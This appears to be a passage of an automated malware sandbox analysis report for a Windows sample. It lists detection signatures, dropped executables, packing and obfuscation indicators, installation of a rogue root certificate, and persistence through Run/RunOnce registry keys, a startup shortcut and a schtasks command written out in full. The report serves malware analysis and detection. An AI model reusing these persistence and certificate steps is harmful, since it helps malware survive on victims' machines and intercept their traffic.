Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: wfJfUGeGT3.exe

Static file information: File size 1411961 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: wfJfUGeGT3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.0000000005694000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4599535887.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.00000000012FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.0000000001281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: G.pdb source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Unpacked PE file: 31.2.build2.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Unpacked PE file: 31.2.build2.exe.400000.0.unpack

.NET source code contains potential unpacker

Source: contorax[1].exe.11.dr, -Module-.cs	.Net Code: EmptyCAHolderUnsafeToStringArray System.AppDomain.Load(byte[])
Source: contorax.exe.11.dr, -Module-.cs	.Net Code: EmptyCAHolderUnsafeToStringArray System.AppDomain.Load(byte[])

Binary contains a suspicious time stamp

Source: contorax[1].exe.11.dr

Static PE information: 0xFA1A71C5 [Wed Dec 20 05:51:01 2102 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Code function: 0_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406312

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: exbuild[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: 36f677264b.exe.11.dr	Static PE information: real checksum: 0x1de45c should be: 0x1e3e45
Source: meta[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x2b0038
Source: exbuild.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: contorax.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x20526
Source: crypteda[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1
Source: crypteda.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1
Source: random[1].exe.11.dr	Static PE information: real checksum: 0x1de45c should be: 0x1e3e45
Source: BowExpert.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x16389d
Source: BowExpert[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x16389d
Source: GOLD[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5a6a4
Source: kitty.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x55f6e
Source: contorax[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x20526
Source: meta.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x2b0038
Source: GOLD.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5a6a4
Source: kitty[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x55f6e

PE file contains sections with non-standard names

Source: 3546345.exe.11.dr	Static PE information: section name: /4
Source: 3546345.exe.11.dr	Static PE information: section name: /14
Source: 3546345.exe.11.dr	Static PE information: section name: /29
Source: 3546345.exe.11.dr	Static PE information: section name: /41
Source: 3546345.exe.11.dr	Static PE information: section name: /55
Source: 3546345.exe.11.dr	Static PE information: section name: /67
Source: 3546345.exe.11.dr	Static PE information: section name: /80
Source: 3546345.exe.11.dr	Static PE information: section name: /91
Source: 3546345.exe.11.dr	Static PE information: section name: /102
Source: meta[1].exe.11.dr	Static PE information: section name: .managed
Source: meta[1].exe.11.dr	Static PE information: section name: hydrated
Source: meta.exe.11.dr	Static PE information: section name: .managed
Source: meta.exe.11.dr	Static PE information: section name: hydrated
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: prspuaeb
Source: random[1].exe.11.dr	Static PE information: section name: plcvpmpk
Source: random[1].exe.11.dr	Static PE information: section name: .taggant
Source: 36f677264b.exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name: .idata
Source: 36f677264b.exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name: prspuaeb
Source: 36f677264b.exe.11.dr	Static PE information: section name: plcvpmpk
Source: 36f677264b.exe.11.dr	Static PE information: section name: .taggant
Source: channel2[1].exe.11.dr	Static PE information: section name: /4
Source: channel2[1].exe.11.dr	Static PE information: section name: /14
Source: channel2[1].exe.11.dr	Static PE information: section name: /29
Source: channel2[1].exe.11.dr	Static PE information: section name: /41
Source: channel2[1].exe.11.dr	Static PE information: section name: /55
Source: channel2[1].exe.11.dr	Static PE information: section name: /67
Source: channel2[1].exe.11.dr	Static PE information: section name: /80
Source: channel2[1].exe.11.dr	Static PE information: section name: /91
Source: channel2[1].exe.11.dr	Static PE information: section name: /102
Source: channel2.exe.11.dr	Static PE information: section name: /4
Source: channel2.exe.11.dr	Static PE information: section name: /14
Source: channel2.exe.11.dr	Static PE information: section name: /29
Source: channel2.exe.11.dr	Static PE information: section name: /41
Source: channel2.exe.11.dr	Static PE information: section name: /55
Source: channel2.exe.11.dr	Static PE information: section name: /67
Source: channel2.exe.11.dr	Static PE information: section name: /80
Source: channel2.exe.11.dr	Static PE information: section name: /91
Source: channel2.exe.11.dr	Static PE information: section name: /102
Source: Channel1[1].exe.11.dr	Static PE information: section name: /4
Source: Channel1[1].exe.11.dr	Static PE information: section name: /14
Source: Channel1[1].exe.11.dr	Static PE information: section name: /29
Source: Channel1[1].exe.11.dr	Static PE information: section name: /41
Source: Channel1[1].exe.11.dr	Static PE information: section name: /55
Source: Channel1[1].exe.11.dr	Static PE information: section name: /67
Source: Channel1[1].exe.11.dr	Static PE information: section name: /80
Source: Channel1[1].exe.11.dr	Static PE information: section name: /91
Source: Channel1[1].exe.11.dr	Static PE information: section name: /102

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D8B75 push ecx; ret	19_2_005D8B88
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CCBF1 push eax; retf	19_2_005CCBF8
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB2808 push ds; retf	24_2_00CB280B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB280D push ds; retf	24_2_00CB281B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB02B4 push ecx; ret	24_2_00CB02C7
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007502B4 push ecx; ret	27_2_007502C7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0042136C push ecx; ret	31_2_0042137F
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02A147F0 pushad ; iretd	31_2_02A147FD
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02A12448 pushad ; retn 0009h	31_2_02A12455
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B115D3 push ecx; ret	31_2_02B115E6

Source: GOLD[1].exe.11.dr	Static PE information: section name: .text entropy: 7.994093571693808
Source: GOLD.exe.11.dr	Static PE information: section name: .text entropy: 7.994093571693808
Source: crypteda[1].exe.11.dr	Static PE information: section name: .text entropy: 7.99930616062516
Source: crypteda.exe.11.dr	Static PE information: section name: .text entropy: 7.99930616062516
Source: random[1].exe.11.dr	Static PE information: section name: entropy: 7.984181684209861
Source: random[1].exe.11.dr	Static PE information: section name: prspuaeb entropy: 7.952080487660967
Source: 36f677264b.exe.11.dr	Static PE information: section name: entropy: 7.984181684209861
Source: 36f677264b.exe.11.dr	Static PE information: section name: prspuaeb entropy: 7.952080487660967
Source: build2[1].exe.11.dr	Static PE information: section name: .text entropy: 7.725782681688218
Source: build2.exe.11.dr	Static PE information: section name: .text entropy: 7.725782681688218

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr			Jump to dropped file

Installs new ROOT certificates

Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000223001\36f677264b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	File created: C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	File created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Jump to dropped file
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	File created: C:\Users\user\Windows.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	File created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	File created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

File created: C:\Users\user\Windows.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework

Drops PE files to the user root directory

Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

File created: C:\Users\user\Windows.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

File created: C:\Windows\Tasks\Hkbsse.job

Stores files to the Windows start menu directory

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_006359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		19_2_006359B3
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		19_2_005C5EDA

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_005D33B7

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
